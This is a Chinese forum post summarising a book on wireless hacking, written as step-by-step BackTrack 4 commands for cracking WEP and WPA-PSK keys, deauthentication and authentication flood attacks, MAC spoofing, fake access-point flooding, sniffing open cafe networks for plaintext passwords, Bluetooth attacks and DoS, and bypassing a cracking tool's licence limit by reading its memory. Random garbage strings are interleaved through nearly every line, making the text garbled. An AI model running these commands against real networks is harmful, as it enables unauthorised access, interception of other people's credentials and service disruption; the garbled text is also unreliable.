少校

- 注册时间
- 2008-11-14
- 金币
- 2277 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
2 J0 c" v7 t& c) r
& I2 ^( \ B) D以下所有操作均在BackTrack 4中进行。& h4 c8 p& f2 `0 M
- V3 F- g& X) v2 u$ M. l* o2 b
1 r$ c# ^6 U' t4 }无线WEP加密P解:
9 h( }9 L1 T4 y" m- i) H t# n' j% \3 U" \) h* M
注入P解:
' B- F3 k1 U) n% w
- L# Y, {- v! K/ `! Q9 a% Y+ iifconfig
: _, T2 o9 S! m
$ t% m# t+ J7 L3 t2 K# c5 K0 R7 yifconfig –a
, k" R G3 K0 P2 U, j
& Q6 o2 \) G8 kifconfig wlan0(无线网卡) up
7 F- j! W* f! a/ b$ ~" X
0 t# E! q: G$ |6 {' I: Aairmon-ng start wlan0
6 u3 a% D' T" ~
: ~( ?9 }( O+ F/ x5 C \- Xairodump-ng mon03 c, d% B; V: y1 _# `7 n
4 E( s3 O1 _& Y& Z1 x/ s1 ~airodump-ng --ivs –w ivsfile –c 频道 mon0或9 @( b) j8 N$ P( J
) W0 g1 L- I3 u, M3 c& Cairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
& _/ |6 u5 S& k5 \) N
/ b( L h9 l6 U; [9 t1 eaireplay-ng -3 –b BSSID –h Station mon01 M; T) ^. P+ n. d5 c1 P! p! g8 F
1 I$ ^% m) j; @
aircrack-ng ivsfile-01.ivs5 ~5 h, ?& c% X8 i, W" U7 `9 W. }
z( ~# |4 Q' ~3 @/ i y
虚连接P解(适用于无客户端连接APP解)" w8 i$ C. Q8 e: Y; a
9 L, A/ q' Q0 z# rifconfig( ^; N& V6 |2 H2 d% M( L
5 @2 r& Y b8 o8 X3 R/ Gifconfig –a) y( S# @. x1 w n) n% D8 Z
# `4 Y* m3 u- c6 C
ifconfig wlan0(无线网卡) up- O: Y5 F1 H* j8 z% q! O" C% w! [
' ? j( b* Y5 Hairmon-ng start wlan0$ @0 ~' _* |6 U: a* b
3 O7 e4 d" x+ W. ^airodump-ng mon0' N+ x z7 A6 _, p# G
3 U, ]& S% P4 z, t+ [airodump-ng --ivs –w ivsfile –c 频道 mon0或
, E+ `& M! P+ d0 e& b9 s) `: m: f+ C6 n/ m9 R. k+ Z
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon02 Q j( z9 V, B+ ^) k5 n4 o j8 r
1 Y& E$ q$ S' b9 B) @; l$ P8 C waireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
z% N! D+ B( @ g) F5 x. v2 E: L' }3 w
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon04 q1 s+ S& E/ w/ x. N l
+ f3 _/ S# [; j' {) `6 k$ naircrack-ng ivsfile-01.ivs3 X2 A, b9 O7 D0 N8 _9 T J; G
1 B7 ~, |# i. @* Z2 Y* T
; h' L, z- b/ G还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
, X) i4 {4 ^. |5 @; K
( d0 ]. }/ t+ q- ~/ w
9 {& I* `& h( u: G" DWPA-PSKP解
# J4 ~* j, h% N# ^5 q) e
5 f* }# A) o- D$ e9 B6 o/ kifconfig
: R ~5 e. a$ ^
# l" D6 ?, Z1 o" j. _ifconfig –a5 ], p" c! M( H; |/ I
' m' l9 h( A3 a% p2 n* D
ifconfig wlan0(无线网卡) up
) V/ b/ R# X4 F( l
4 i8 w1 _: T5 l+ A/ }2 Jairmon-ng start wlan0
5 X2 I3 z: x+ @* R+ y m
" E5 p- U+ g }9 L2 A5 `airodump-ng mon02 P/ r, J- a0 ^* C0 H
) f% M+ g" n5 _: `! ^: {airodump-ng –w capfile –c 频道 mon0
2 y* o8 o l6 d7 a. W
" t# L6 U6 f( faireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包( [* G% T, ~- Q0 ?
6 F! d9 U) f# J' Q
aircrack-ng –w Dic capfile-01.cap或
( P7 V1 [2 v2 z
' [6 H* v+ o- W- w4 e# Fcowpatty –f Dic –r capfile-01.cap –s SSID+ w9 ]) Q% U. @4 r% |5 ]7 |
! [0 h4 V! @# W- A1 F' ^
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID* V7 \5 x5 g8 U# J: f8 d) l
' p( E& x& X& U+ o3 g傻瓜式P解软件SpoonWPA。1 t/ n- J2 b$ _& F: f- q2 C. f! d
% f. G [. _1 J& pBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
$ l" j& ]: x& g, n9 f8 w9 R, ?' V P" }5 r7 t7 ?
, B1 W( {# v, V$ v9 s) j字典文件的生成和上传
. B- e+ U5 M# ~( U
* t- P9 f8 M9 p0 B- m) P在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
/ a5 K! x! p7 p1 x4 ~4 x0 e
6 P" U6 f' N8 u5 w# {( B6 P% ~% q' C7 \* d' [+ t
BT4下开启Tftp:Services—TFTPD—start TFTPD
; P6 K4 g) R3 |
I+ k& F9 K) ~在Windows的CMD中运行 tftp –i IP put **.dic7 h3 {3 Y% l' q5 M' A4 {6 d' E
K+ o; Y% ?4 S) V* h6 P" l% D& t5 ]2 F
BT4下开启SSH:Services—SSH—start SSH) \" N' N" d5 Z, j" ~& T2 o* k
! S* E( @- O7 yWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
9 r8 L" u8 _ O% F# z) }8 W( d* S
' c: O$ M' @4 O \: C. P
AP限制MAC时的解决
' x2 ~3 J$ Z4 b" r% z; W! N8 T3 ]
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:* |3 t4 p& r$ f- @/ j2 | [
; G1 z: m$ ^, O/ M" f4 }5 z
ifconfig wlan0 hw ether NewMAC5 f- Z, S, ?/ ?0 ?5 E3 }2 h6 N
2 ~; p: ^( j6 T$ m! g- S$ i; U
% O& F/ M, D$ ~0 H7 n关闭SSID广播的AP探测:
% O, L1 s& W# T( _6 ?( ?+ ~) q+ O. P- u$ j! Y+ _- @
1. Deauth攻击:. P( m% b( \/ C0 r
. {/ k0 N0 x O1 f$ kairodump-ng mon0
: ~1 F& G* }& J0 g: z, q
8 t, i5 R* R% P( taireplay-ng -0 10 –a BSSID –h Station mon0
' q0 O. [, x! h7 A1 Z8 |5 H# t1 X. s
2. 抓包分析
6 d0 z0 C- z, V; l
0 `$ }' `( b; v0 iOmnipeek" q* j* N) _: v1 o# \
3 y! ]. u% c( w2 u9 i
Tcpdump –n –e –vvv –i 网卡名
: m9 O* [+ S" }5 o \4 b2 N+ {( U, }; \$ Q3 q8 t% R0 i$ S$ @
3. 暴力P解; _# Y; {. O* i/ N9 ?" B8 k$ F
- u- m7 F" I+ [5 qCharon 1.1暴力P解3 k7 ^! n( `/ t
1 @) H* y4 b+ I. y" h
4 x2 c' l$ Z/ a% e z0 B
无线加密数据包的解密 p) S3 u! ] |! J( O, P
* Z' `- |( B0 p& _! \; b+ _
6 l* G7 k8 d! r# i7 Q使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
( E2 m; W2 d. R7 c5 L% z9 D4 L
t N6 s d. n/ Z( k; sFilter NS DNS解析数据包* r, N' ~$ m% u' F' I9 n
2 t7 T8 h- j7 u" `! S4 y
Filter:HTTP WEB访问数据包8 u- h0 f! D4 a
+ P1 S" O+ d0 e6 x0 M5 P2 zFilter:msnms MSN; a9 v' k/ d1 _
. W0 o4 M7 J; W% j/ ~
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。6 N& ^/ A, F1 d' q
6 A* a' g( w; Z/ `使用airdecap-ng解密:
! Y/ o& b1 D$ @2 U; ?% `
3 ~7 d6 y$ l' O' X$ L: n) OAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap( K* ~ c' w( H/ d- B& j& i
% E+ y) \$ ~) [% {
" B, O; R' J0 e$ |- e咖啡馆中无线数据截取(开放式无加密AP), X* z t* r9 a- ]
) O8 n4 |% y6 i7 C) ^8 s1.Airodump-ng –w data –c频道 mon0
( ?% G; h. g3 z2 j3 j# c; M; J7 m* `6 F# P, [
2.使用WireShark打开分析
. V: f* a9 W. s# K$ U3 Q7 H6 t9 O6 [* {; T' h
% \! H+ |2 I' k
BT4下的渗透工具:
j" ?( G3 j; B: T) Y) g
3 Q" p, X2 W) }# f' l- Onmap –sP IP/24 判断C段下存活的主机 % N% y5 [) b+ u, L0 n. L
$ q+ j; C$ A* t& [/ T! ^
nmap –vv –sS IP/24 –p Port 扫描指定端口是否开放) a' j! Q! k- v; ]/ X3 g/ @, k
1 E5 k# S* `, O& M6 e; O
nmap –vv –sV IP –p port 指定端口的详细信息。。。) c6 V p$ b& ~6 l' V/ [: j8 Q: K
! p" l8 k3 O: N5 O+ [
namp –O IP/24 判断主机的系统版本+ x3 R( r/ P& R7 } K, m
% | G0 x! I( _! q6 l7 c9 \. m6 E/ ^/ W- I, ~2 O; a; @2 G5 x8 B
GUI 版nmap:Zenmap 1 p0 }5 k1 }( i2 w* W$ ?2 C! O& b
8 S* F0 [) [1 L: h
?! @' t/ N N: \& {/ }! }Amap使用:amap –B IP port! n9 a" B, ? G) ^9 R0 l, }
* r3 d, z, B2 n
Nbtscan(扫描Windows网络NetBios信息):# I3 e% }9 S0 }- E
9 J5 a: y/ t6 y' G, P0 Q: u vnbtscan –v –s : IP/24
/ S8 ^ g: [9 y" E9 C; k
7 o3 R" Q" w' Q2 |3 ]* V( Gnbtscan –r IP6 A; {# v/ [1 {! g) y$ |
" p- ~, M! V7 ?
| g7 `5 \, n e1 C7 p
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
! n5 T0 S4 Y& a4 x4 E5 _5 A3 t% V" k
1 B! `& e) u* j1 |
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
! E: l. H' [' c* B' a; u# }& v$ r( W
BruteSSH: ./bruthe.py –h IP –u Username –d Dic4 c2 @9 @. ~4 s* F) E; y
d& z3 S( A4 D0 TMetasploit3使用0 r7 U' A2 h, g/ c% {4 S
无线D.0.S7 v9 _1 j, P% y$ r
0 G" D H# g' H& Q0 z
{# i7 N' J" o$ CAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)( d7 a/ }3 h. D- q+ r, P
* B0 W. B& @, g$ v( b" m) i! vairmon-ng start wlan0
/ s3 ~2 J$ @" U' o% \; I( E: I6 t
airodump-ng mon0
( ?! a9 S* m+ ^5 ]% z* p$ _- e6 T- ] W6 f. j' c
mdk3 mon0 a –a BSSID
8 `: }8 R4 c- u j$ O
8 Q' l+ B6 K( b: {$ E对所有的AP攻击:mdk3 mon0 a
5 j' z+ ?( c O; W" z. e" G1 ^2 X0 i# b, m
' r, u! s7 [3 ?$ `$ ?/ d6 d
Deauth Flood 攻击. H8 y" J% T/ g. @3 c) h
+ c3 s3 Q6 M- T9 m; xmdk3 mon0 d –c Channel
% N% X, q. `- n3 E8 t
3 h7 i' i4 I8 m5 Q% |4 L7 O( P图形化D.O.S攻击:Charon1 @2 X, w8 w+ Z9 M8 W& E) k% S% ?3 G
- Y1 b+ b# _+ y1 z0 _8 ~
/ s, K) G, }0 z) r( h/ z当受到攻击时,使用Wireshark抓包可以看到异常信息。
: Q3 a3 `& y& d
3 ^7 l& H/ a% C/ o' @% Y: f# W3 j# t F$ l8 w2 a" z7 v* s
WPA-PSK高速P解1 `. ~0 f; j! ]! [
2 u. v% `8 i- n4 h9 `6 T' b1. WPA-PSK PMK Hash TablesP解" Z# n( `' t, E" |+ y8 J _
' c# r5 f! v+ Q- k' K4 V9 F) B1 ]- `3 X
Cowpatty –d HashTable.hash –r ***.cap –s SSID& [, G8 a: h5 e" y. |7 r9 V
& z' O* B" O" m! H$ s1 MHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
6 \5 l8 e' ~' g1 o0 |+ x8 v
& E4 D& D& h) H4 `2. GPU辅助高速P解
4 j( D. N( T6 E7 E* Y8 H: W3 | n
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
; i# B$ p/ i' K6 w; T1 a6 q4 @# d; \' a: K: n
3. 分布式P解& J% k' {1 s9 m& E5 C1 ^
. n$ p5 [7 }7 f; n4 ~$ s( G2 p" F; q7 H+ ^: s
AP的伪造, c/ `; I! T# m/ { g' q+ \' m
; m& K8 r k- J$ A6 b0 P2 S把AP的MAC改成目标AP的MAC; {2 x9 }) G8 r0 q! g: ^
6 v5 X& ^- K8 U7 \网卡软AP
6 n0 m" E4 U- Q* j4 S7 M
" s0 m t: }; F4 I1 V4 \# b9 _6 Z2 M. y, L+ E
伪造大量虚假AP信号:1 |/ q0 C7 P( \9 N2 `- Z
; y/ g1 G( n- N4 [/ a" y8 _随机SSID:mdk3 mon0 b –g –c 频道 & k1 \7 h/ v9 P
1 \) O" B. J9 }0 t# `8 r3 z' @- F
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
# w! J0 a9 T- C1 z& `/ W& S B2 T/ S; i. Z* _
- }: _7 }7 K" R, BWar-Driving
+ ?2 |9 Q: d6 X9 v; t# A! K1 h5 c
4 z0 J+ a( L* X热点地图绘制" J) U- ?1 `; `4 u3 e0 p I
9 V9 e; O; p- q7 S
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
2 P' _. o# u( m( h0 o! O8 c' y6 }7 ~/ c
0 ~0 H$ q6 \7 W8 f6 NNetstumble
7 u/ C$ y& W! F/ i6 X: ^. P( q( _$ z, @- y' m+ T
. m/ j: Z7 [ w0 e
蓝牙Hacking
# h9 q2 F1 w @4 K7 k" ?+ X
2 O% s B3 Z. p t9 e, }& R8 kWindows下的Blue Soleil工具
0 f" w: o) V, l" R" o C" W7 I% d! D' m( S: c1 g. J" }# W/ @; h( t
BT4:* a- \8 I4 L5 _' w) z% s
% R+ ~5 k$ H8 c# f! f; J, L
hciconfig 查看蓝牙适配器) z: E& n1 ~9 C
0 q/ K" s2 J+ g$ x
hciconfig hci0 up 载入蓝牙适配器
+ V6 J) r) m4 y I- A- h( E& }4 \. @" b) D o
hciconfig hci0 class 蓝牙适配器详细信息& T4 m0 l4 ?! F3 }3 k
7 x2 Z0 P3 `( S6 O" u+ }
2 H' q6 n* E, y# ^& j" a9 phcitool(扫描蓝牙)
; D5 [4 O( C% D2 l! a% H/ i9 s( o1 a) ?- U8 P- T
hcitool –i hci0 scan) V0 W1 y( v; L0 t) K: u3 A. p r
T5 Z( I2 P) [! D) {BTscanner(扫描蓝牙)
+ E2 q1 t/ q8 m" c; U
: K" c6 X/ \8 s9 ]& Y% t
4 R1 s7 |/ S0 I4 U, j蓝牙攻击:
8 e% K' b: ?, k O$ y% ]
& y4 _- K6 d+ B. yBlueBugging (适用于BlueTooth V1.1的手机)
0 J0 N2 F5 ]3 ?5 v( s' K+ G
1 d) H( S! Q5 M9 ^1 _" EBluebugger工具:( d7 y6 \; K' E# E+ b; O
. [2 U" A, d1 W0 d" I$ W7 oBulebugger –a HD_Addr info
. Z. }9 L8 A* e8 y% h
0 Z3 s2 o+ l- y0 [' }" G
- v! s$ c' |9 vBlueJacking% J0 |" f- X* B
1 b4 \' H( {) i" \
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
9 t! J5 f' z: t# Q3 z2 D3 Z1 N! Q* g' e
6 \: V/ w+ R9 V! F8 U) _" ?% P9 Y/ f5 U. q2 ~/ R1 a* ?9 k4 I
HD_Addr修改:
% [$ i9 Y9 G2 T+ c* C+ C
$ m+ U& y3 Q; s( Q8 H5 J- WBdaddr工具" a! E b% l2 p) `$ `: p! Y& k( E
# [* f* h7 A* ]bdaddr –i 蓝牙设备名 新HD_addr- j: `. f9 z# f& n, a* V
; v6 a" `& L: ?6 N/ M! u. A3 ]) e: q- [* _0 {% H G: v @# k$ e
蓝牙D.O.S
. L1 d5 |* }2 O: u$ f w+ K) }7 d6 D- Z
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
! e# C7 X U F; V6 a' n) K! T; ]6 T. w7 C
hciconfig
. m/ ?4 y1 m, l# O: x* E) L* S4 @! B( T
hciconfig hci0 up
A( U5 F! g0 ~
0 C. {2 X" S9 b. G3 D4 phcitool –i hci0 scan
' w4 t1 `) L" W# p
/ {6 Y8 Z! ] g% r$ a& r. `) sl2ping –s 10000 –目标MAC
4 i, K$ o4 X; M5 p% m, N3 y+ ^0 S M, p% _
3 D" c" Q/ z9 L
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
2 o* Q& y. F9 Z @' ?- n! s
# o8 b \& i, F) ~! [, ?./fang –r ************-############ -s: W) s& M& M- g" G' v
( A# G) L v, B" ?7 w% y3 G9 ?暴力P解************-############的蓝牙设备
$ A' ^1 e& ^4 o9 I( f: V ~
3 D5 E! _" G1 l( l7 f4 D* }./fang –l 各厂商BD_Addr分配! ^9 h0 N# ]/ |6 f- _8 |
7 g: t; o) p, S6 h+ c% t$ ?# P- w$ f2 _+ j0 u; j1 i+ `
WifiZoo使用
$ o# f1 b7 \+ s% q/ d8 d8 P4 r& G% \1 ]( L3 L- P# `3 e
./wifizoo.py –c Capfile/ ]. t0 H, d- D, f8 f- y0 z
0 r: ^2 o X& c7 s% C) X* C访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|